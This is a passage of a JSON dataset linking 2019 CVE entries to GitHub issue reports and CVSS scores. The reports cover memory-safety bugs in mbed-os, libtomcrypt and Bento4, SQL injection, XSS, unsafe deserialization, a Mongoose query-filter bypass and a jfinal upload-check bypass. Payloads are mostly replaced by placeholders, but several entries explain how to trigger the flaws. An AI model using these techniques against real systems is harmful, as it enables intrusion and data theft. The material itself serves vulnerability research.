board. Target(s) affected by this defect ? MQTT library of APITAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? Mbed OS MQTT library NUMBERTAG No NUMBERTAG Mbed OS latest release What version(s) of tools are you using. List all that apply (E.g. mbed cli) mbed cli latest version How is this defect reproduced ? Use bug_mqtt NUMBERTAG and bug_mqtt NUMBERTAG as received mqtt packet after mqtt connect and subscribe FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17211",
        "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/11804",
        "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/11804",
        "Repo_new": "armmbed/mbed-os",
        "Issue_Created_At": "2019-11-04T03:10:22Z",
        "description": "The bug2 of APITAG APITAG library. Description of defect Reference: URLTAG URLTAG Function: APITAG URLTAG The APITAG builder is responsible for crafting outgoing APITAG messages. The function APITAG is used to calculate the needed memory for the APITAG message from the sn_coap_hdr_s data structure. Both returned_byte_count and src_coap_msg_ptr >payload_len are of type uint NUMBERTAG t. When added together, the result returned_byte_count will wrap around the maximum as shown in line NUMBERTAG As a result, insufficient buffer is allocated for the corresponding APITAG message. CODETAG c static int NUMBERTAG t APITAG uint NUMBERTAG t option_len, const uint8_t option_ptr, ...) { ... memcpy(dest_packet, option_ptr, option_len); ... } ` In the following, we list other locations which will cause out of bound memory accesses rooted in this vulnerability. URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG Target(s) affected by this defect ? APITAG APITAG library Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) mbed cli latest version How is this defect reproduced ? Use bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG and bug_coap NUMBERTAG as input of demo code in Bug NUMBERTAG URLTAG will trigger bugs. FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17212",
        "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/11803",
        "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/11803",
        "Repo_new": "armmbed/mbed-os",
        "Issue_Created_At": "2019-11-04T03:01:01Z",
        "description": "The bug of APITAG APITAG library. Description of defect Reference: URLTAG URLTAG Function: sn_coap_parser_options_parse URLTAG URLTAG The APITAG parser is responsible for parsing received APITAG packets. The function APITAG parses APITAG input linearly using a while loop. Once an option is parsed in a loop, the current point ( packet_data_pptr) is increased correspondingly. The pointer is restricted by the size of the received buffer, as well as a delimiter byte APITAG as shown in line NUMBERTAG of the code snippet below. CODETAG Unfortunately, inside each while loop, the check of the value of packet_data_pptr is not strictly enforced. More specifically, inside a loop, packet_data_pptr could be increased and then dereferenced without checking. Moreover, there are many other functions in the format of sn_coap_parser_ () that do not check whether the pointer is within the bound of the allocated buffer. All of these lead to heap or stack buffer overflow, depending on how the APITAG packet buffer is allocated. In the following, we list other locations which cause out of bound memory accesses rooted in this vulnerability. URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG Target(s) affected by this defect ? APITAG APITAG library Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) mbed cli latest version How is this defect reproduced ? Using bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG bug_coap NUMBERTAG and bug_coap NUMBERTAG as input of demo codes below, previous crash examples in sn_coap_parser.c will be triggered. ERRORTAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17225",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/845",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/845",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2019-09-20T07:36:13Z",
        "description": "Admin Member JSON Update Store XSS vulnerable. Test it on version NUMBERTAG First login the panel with user credential, Go to member tag from left menu. APITAG Username, Full Name, Email are editable with double click on it. Insert the following payload ERRORTAG Xss alert are trigger. Poc FILETAG Note. Script tag are filter in the input field. it is work at username APITAG Poc NUMBERTAG FILETAG Please fix and filter all input tag. Thank you.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-17263",
        "Issue_Url_old": "https://github.com/libyal/libfwsi/issues/13",
        "Issue_Url_new": "https://github.com/libyal/libfwsi/issues/13",
        "Repo_new": "libyal/libfwsi",
        "Issue_Created_At": "2019-10-01T14:11:34Z",
        "description": "OOB read of NUMBERTAG in libfwsi_extension_block NUMBERTAG ersion: lnkinfo NUMBERTAG ERRORTAG To reproduce: ./lnkinfo FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-17264",
        "Issue_Url_old": "https://github.com/libyal/liblnk/issues/38",
        "Issue_Url_new": "https://github.com/libyal/liblnk/issues/38",
        "Repo_new": "libyal/liblnk",
        "Issue_Created_At": "2019-09-13T07:58:33Z",
        "description": "heap buffer overflow in APITAG As i understand from issue NUMBERTAG the bug was patched in commit NUMBERTAG b NUMBERTAG a3 but while fuzzing lnkinfo from the master branch, I still encounter this issue. I complied liblnk with gcc and g++ enabling ASAN the fuzzing results showed me a heap buffer overflow in APITAG ASAN ERRORTAG I've attached FILETAG for reference, I also observed the program don't return me any SEGFAULT when I passed the above corpus APITAG ASAN). Request maintainer to please have a look or suggest if I am missing something here.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-17267",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2460",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2460",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-09-17T06:34:14Z",
        "description": "May be a new default typing gadget. Hey, buddy. I may have found a new gadget can be used to exploit jackson which can cause RCE. I have sent the report to EMAILTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17268",
        "Issue_Url_old": "https://github.com/beenhero/omniauth-weibo-oauth2/issues/36",
        "Issue_Url_new": "https://github.com/beenhero/omniauth-weibo-oauth2/issues/36",
        "Repo_new": "beenhero/omniauth-weibo-oauth2",
        "Issue_Created_At": "2019-10-09T12:17:49Z",
        "description": "CVETAG report for omniauth weibo oauth2. Hey, I took courtesy of reporting the malicious code injection in APITAG into the CVE database. FILETAG Just wanted to let you know. They initially assigned the APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17352",
        "Issue_Url_old": "https://github.com/jfinal/jfinal/issues/171",
        "Issue_Url_new": "https://github.com/jfinal/jfinal/issues/171",
        "Repo_new": "jfinal/jfinal",
        "Issue_Created_At": "2019-08-13T06:36:58Z",
        "description": "There is a vulnerability which can bypass the APITAG function in APITAG ,so that I can upload any kind of files effectively. In APITAG , the upload function APITAG handle uploading files in this way NUMBERTAG handle upload request and upload all of the files in request without any safety precautions NUMBERTAG then judge the upload files and delete the dangerous files by APITAG function. However, if I can try to create a exception which happened after upload and before APITAG function , the dangerous files will upload to the server successfully. So, I make a request like this FILETAG In my code , I just accept file param like APITAG APITAG I send a request which have two params(\"file\" and APITAG , the code will upload jsp file to the server and stop running before APITAG function, since the code will catch an exception ERRORTAG Content disposition corrupt: Content Disposition: form data: APITAG . FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17357",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3025",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/3025",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2019-10-12T19:46:24Z",
        "description": "SQL Injection in FILETAG . Describe the bug As reported by Eldar Marcussen of APITAG there is a SQL injection vulnerability in Cacti's FILETAG . Expected behavior Cacti should be not contain SQL vunderabilities",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17358",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3026",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/3026",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2019-10-12T19:52:09Z",
        "description": "Unsafe deserialization in Cacti. Describe the bug As reported by Eldar Marcussen of APITAG Cacti's unserialization of form data does not properly validate the form input which can result in unsafe unserialization operations. Expected behavior Cacti should always check serialized data for expected formatting, or utilize JSON data within the form post to avoid the use of the APITAG function when dealing with untrusted data.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17362",
        "Issue_Url_old": "https://github.com/libtom/libtomcrypt/issues/507",
        "Issue_Url_new": "https://github.com/libtom/libtomcrypt/issues/507",
        "Repo_new": "libtom/libtomcrypt",
        "Issue_Created_At": "2019-10-03T17:45:17Z",
        "description": "Vulnerability in der_decode_utf8_string. Description The APITAG function (in der_decode_utf8_string.c) does not properly detect certain invalid UTF NUMBERTAG sequences. This allows context dependent attackers to cause a denial of service (out of bounds read and crash) or read information from other memory locations via carefully crafted DER encoded data. Attack vectors To exploit this vulnerability an attacker must be able to provide crafted DER encoded data to APITAG (e.g. by importing a NUMBERTAG certificate). Information disclosure is made possible by a NUMBERTAG steps attack where the imported data is later somehow re encoded and sent to the attacker (e.g. import and then export NUMBERTAG certificate). Details This vulnerability affects APITAG NUMBERTAG and earlier versions. For the remainder of this issue I will be referring to the code of APITAG last released version (i.e. version NUMBERTAG FILETAG The cause of the problem lies in the decoding loop at line NUMBERTAG of der_decode_utf8_string.c: CODETAG Here the variable tmp contains the value of the first byte of the utf NUMBERTAG encoded character. In accordance to FILETAG the number of most significant bits of tmp set at NUMBERTAG from left to right) prior to a NUMBERTAG indicates the number of bytes used to encode the utf NUMBERTAG character (i.e. a sequence starting by NUMBERTAG indicates a size of NUMBERTAG bytes) . However notice that NUMBERTAG is not a valid NUMBERTAG st byte. The loop in question fails to detect this case and process a sequence starting with NUMBERTAG as if it was a sequence of two bytes. A valid utf NUMBERTAG sequence of two bytes is of the form NUMBERTAG and can encode values up to NUMBERTAG FF. Yet APITAG accepts sequences of two bytes of the form NUMBERTAG This invalid form offers an additional free bit and can therefore encode values up to APITAG hence including a range of values that would normally be encodable only using a sequence of at least NUMBERTAG bytes. This behavior can be used to trick APITAG into reporting a length bigger than the actual size of the encoded string. This works because the function APITAG returns a number of bytes based on the size of the decoded value. To see an example of how this can be exploited to crash the program or read data after the DER buffer, let us consider the function APITAG (used to decode NUMBERTAG certificates). When an utf NUMBERTAG entry is encountered this function will first decode it in an array pointed by APITAG and then compute the length using APITAG on the decoded data: ERRORTAG The computed len is later used to move forward some pointers: APITAG The variable inlen points to the size of the remaining number of bytes to decode. Using the aforementioned bug it is possible to craft an input such that APITAG . In this case APITAG will underflow resulting in a much bigger value than the actual size of user's input. Finally, this can be used to crash the program (e.g. by reading invalid memory location) or to trick the DER decoder into including adjacent data into the decoded sequence. APITAG Following I include two profs of concept. poc1 will likely cause a program to crash by triggering a read of NUMBERTAG ffffffff additional bytes (thus probably ending up in an invalid memory page). poc2 will add NUMBERTAG ffff bytes of adjacent memory to the decoded sequence. This data can then be accessed, in a NUMBERTAG steps attack scenario, by exporting the certificate. Notice that poc2 will very likely NOT cause the program to crash since any invalid DER type encountered after the leaked data will just cause the decoding to stop gracefully without causing any further error (line NUMBERTAG of der_decode_sequence_flexi.c). CODETAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17371",
        "Issue_Url_old": "https://github.com/glennrp/libpng/issues/307",
        "Issue_Url_new": "https://github.com/glennrp/libpng/issues/307",
        "Repo_new": "glennrp/libpng",
        "Issue_Created_At": "2019-07-11T08:03:58Z",
        "description": "memory leak in png_malloc_warn and png_create_info_struct. Hi,libpng team. there are memory leaks in the function APITAG and APITAG , respectively. I compiler gif2png to the NUMBERTAG bit LSB version with ASAN. The software runs in the NUMBERTAG Ubuntu NUMBERTAG services. the bug is trigered by APITAG . FILETAG the asan debug info is as follows: APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG ffff6c NUMBERTAG c0d in png_malloc_warn ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG ffff6c3e NUMBERTAG in png_create_info_struct ( PATHTAG NUMBERTAG d8 in processfile ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ffff NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG df0 in xalloc ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ERRORTAG a6d in APITAG ( PATHTAG ERRORTAG a6d NUMBERTAG in processfile ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ffff NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG df0 in xalloc ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG cc in APITAG ( PATHTAG ERRORTAG NUMBERTAG cc NUMBERTAG in processfile ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ffff NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG NUMBERTAG process NUMBERTAG exited with code NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17383",
        "Issue_Url_old": "https://github.com/dspinhirne/netaddr-rb/issues/29",
        "Issue_Url_new": "https://github.com/dspinhirne/netaddr-rb/issues/29",
        "Repo_new": "dspinhirne/netaddr-rb",
        "Issue_Created_At": "2022-04-21T09:19:14Z",
        "description": "Release NUMBERTAG MENTIONTAG Would it be possible to release NUMBERTAG to APITAG As far as we understand it, it fixes URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17401",
        "Issue_Url_old": "https://github.com/libyal/liblnk/issues/40",
        "Issue_Url_new": "https://github.com/libyal/liblnk/issues/40",
        "Repo_new": "libyal/liblnk",
        "Issue_Created_At": "2019-10-07T18:06:02Z",
        "description": "Heap Buffer Overflow in lnkinfo. We found Heap Buffer Overflow in lnkinfo binary and lnkinfo is complied with clang enabling ASAN. Machine Setup Machine : Ubuntu NUMBERTAG LTS gcc version NUMBERTAG APITAG NUMBERTAG APITAG Commit : c NUMBERTAG bb7 lnkinfo NUMBERTAG Command : lnkinfo v POC POC : FILETAG ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
        "severity": "LOW",
        "baseScore": 3.3,
        "impactScore": 1.4,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-17402",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/1019",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/1019",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-10-06T09:21:25Z",
        "description": "Overflow in exi NUMBERTAG We found vulnerability in exi NUMBERTAG binary and exi NUMBERTAG is complied with clang enabling ASAN. Machine Setup CODETAG ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17417",
        "Issue_Url_old": "https://github.com/lolipop1234/XXD/issues/2",
        "Issue_Url_new": "https://github.com/lolipop1234/xxd/issues/2",
        "Repo_new": "lolipop1234/xxd",
        "Issue_Created_At": "2019-10-08T02:12:20Z",
        "description": "Pbootcms background storage XSS.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-17418",
        "Issue_Url_old": "https://github.com/evi1code/Just-for-fun/issues/2",
        "Issue_Url_new": "https://github.com/evi1code/just-for-fun/issues/2",
        "Repo_new": "evi1code/Just-for-fun",
        "Issue_Created_At": "2019-10-09T05:34:13Z",
        "description": "Metinfo NUMBERTAG ulnerability Name: Metinfo CMS Background SQL Union Select Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG ERRORTAG $no PATHTAG Incoming by user, and Unfiltered. And success function return the information. payload ERRORTAG Vulnerability Name: Metinfo CMS Background SQL Blind Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG ulnerability code ERRORTAG doget_admin_pack function was called in APITAG function, and the two variables of $appno and $site passed by the user were not filtered. payload CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-17419",
        "Issue_Url_old": "https://github.com/evi1code/Just-for-fun/issues/1",
        "Issue_Url_new": "https://github.com/evi1code/just-for-fun/issues/1",
        "Repo_new": "evi1code/Just-for-fun",
        "Issue_Created_At": "2019-10-08T15:57:39Z",
        "description": "Metinfo NUMBERTAG SQL Blind Injection. Vulnerability Name: Metinfo NUMBERTAG CMS Background SQL Blind Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG payload CODETAG Vulnerability code ERRORTAG $id Incoming by user, and Unfiltered. GET payload: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2019-17426",
        "Issue_Url_old": "https://github.com/Automattic/mongoose/issues/8222",
        "Issue_Url_new": "https://github.com/automattic/mongoose/issues/8222",
        "Repo_new": "automattic/mongoose",
        "Issue_Created_At": "2019-10-07T17:38:20Z",
        "description": "Mongoose query . Do you want to request a feature or report a bug ? Vulnerability What is the current behavior? With this vulnerability, an attacker might steal sensitive data/bypass authentication in nodejs applications that use mongoose as front end. When injecting \"_bsontype\" attribute to a query object (e.g., id in find(id)), Mongoose will directly ignore the query object. This can be abused since most nodejs applications treat user input as an object. For example, an attacker can force the query filter condition to be null by adding another attribute (_bsontype) to the user input data. By doing this, an attacker can log into other users' accounts or bypass the token verification logics during password reset NUMBERTAG Even though Mongoose checks the query object according to the scheme when querying in the form of APITAG the vulnerability can still be exploited if developers do queries like APITAG Similar issues are also found it Mongodb, and we have reported it. However, just to be safe, my suggestion is that mongoose should also filter _bsontype before invoking mongodb since _bsontype is an internal attribute used by mongodb NUMBERTAG URLTAG If the current behavior is a bug, please provide the steps to reproduce. Proof of Concept ERRORTAG What are the versions of FILETAG , Mongoose and APITAG you are using? Note that \"latest\" is not a version. Mongoose NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17429",
        "Issue_Url_old": "https://github.com/Adhouma/cms/issues/1",
        "Issue_Url_new": "https://github.com/adhouma/cms/issues/1",
        "Repo_new": "Adhouma/cms",
        "Issue_Created_At": "2019-10-10T02:57:45Z",
        "description": "There is SQL injection in your source code. In the FILETAG file, you get the p_id parameter by GET, and then call the SQL query statement directly by passing the parameter without any filtering. This results in SQL injection Use Sqlamp FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-17430",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/1",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/1",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2019-06-21T10:32:09Z",
        "description": "Reflective XSS vulnerabilities exist in websites. Cross Site Script Users often click on links when browsing websites, using instant messaging software, or even reading e mail. Attackers can steal user information by inserting malicious code into links. After the administrator logged in, open the following one page url: FILETAG poc: in web_recordnum",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17433",
        "Issue_Url_old": "https://github.com/z-song/laravel-admin/issues/3847",
        "Issue_Url_new": "https://github.com/z-song/laravel-admin/issues/3847",
        "Repo_new": "z-song/laravel-admin",
        "Issue_Created_At": "2019-08-27T16:09:59Z",
        "description": "a security issue. laravel admin background XSS first.add xss Roles FILETAG next go to operation log page FILETAG The following is my system environment FILETAG And I think this issue also exists in other APITAG don't know this place.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-17434",
        "Issue_Url_old": "https://github.com/LavaLite/cms/issues/304",
        "Issue_Url_new": "https://github.com/lavalite/cms/issues/304",
        "Repo_new": "lavalite/cms",
        "Issue_Created_At": "2019-09-04T03:51:02Z",
        "description": "Stored XSS. I find a Stored XSS client user can use this vulnerability to attack administrator APITAG use js to send post request, indirectly operate the administrator account\uff0ca serious threat to website security\u3002 exploit client login site,and modify the account name to ERRORTAG now\uff0cif super user login and look APITAG trigger XSS\u3002 FILETAG Hackers can exploit this vulnerability to perform any action by the administrator",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-17452",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/434",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/434",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-09-29T17:37:28Z",
        "description": "SEGV in mp4dump. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 File Dumper Version NUMBERTAG APITAG Version NUMBERTAG Command mp4dump verbosity NUMBERTAG POC file ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17453",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/436",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/436",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-09-30T07:47:11Z",
        "description": "SEGV in mp4compact. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 File Dumper Version NUMBERTAG APITAG Version NUMBERTAG Command mp4compact POC /dev/null ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17453",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/437",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/437",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-09-30T16:31:42Z",
        "description": "SEGV in mp4encrypt. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 Encrypter Version NUMBERTAG APITAG Version NUMBERTAG Command mp4encrypt method OMA PDCF CBC show progress POC /dev/null ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17454",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/435",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/435",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2019-09-29T20:00:36Z",
        "description": "SEGV in mp4info. System Details Commit ID: bc1b NUMBERTAG a Test Machine : Ubuntu NUMBERTAG LTS MP4 File Dumper Version NUMBERTAG APITAG Version NUMBERTAG Command mp4info show samples POC file ASAN Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17488",
        "Issue_Url_old": "https://github.com/b3log/symphony/issues/970",
        "Issue_Url_new": "https://github.com/b3log/symphony/issues/970",
        "Repo_new": "b3log/symphony",
        "Issue_Created_At": "2019-10-05T14:43:47Z",
        "description": "\u4fee\u6539\u5e16\u5b50\u65f6\u6709xss\u6f0f\u6d1e, APITAG \u6839\u636e\u6b64\u9879\u76ee\u62a5\u544a\u5b89\u5168\u6f0f\u6d1e\u7684\u7b56\u7565. APITAG \u6211\u5df2\u5c06\u5177\u4f53\u6f0f\u6d1e\u8be6\u60c5\u53d1\u90ae\u4ef6\u81f3\u4f60\u7684\u90ae\u7bb1 EMAILTAG rg \u6ce8\u610f\u67e5\u6536.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-17489",
        "Issue_Url_old": "https://github.com/shi-yang/jnoj/issues/51",
        "Issue_Url_new": "https://github.com/shi-yang/jnoj/issues/51",
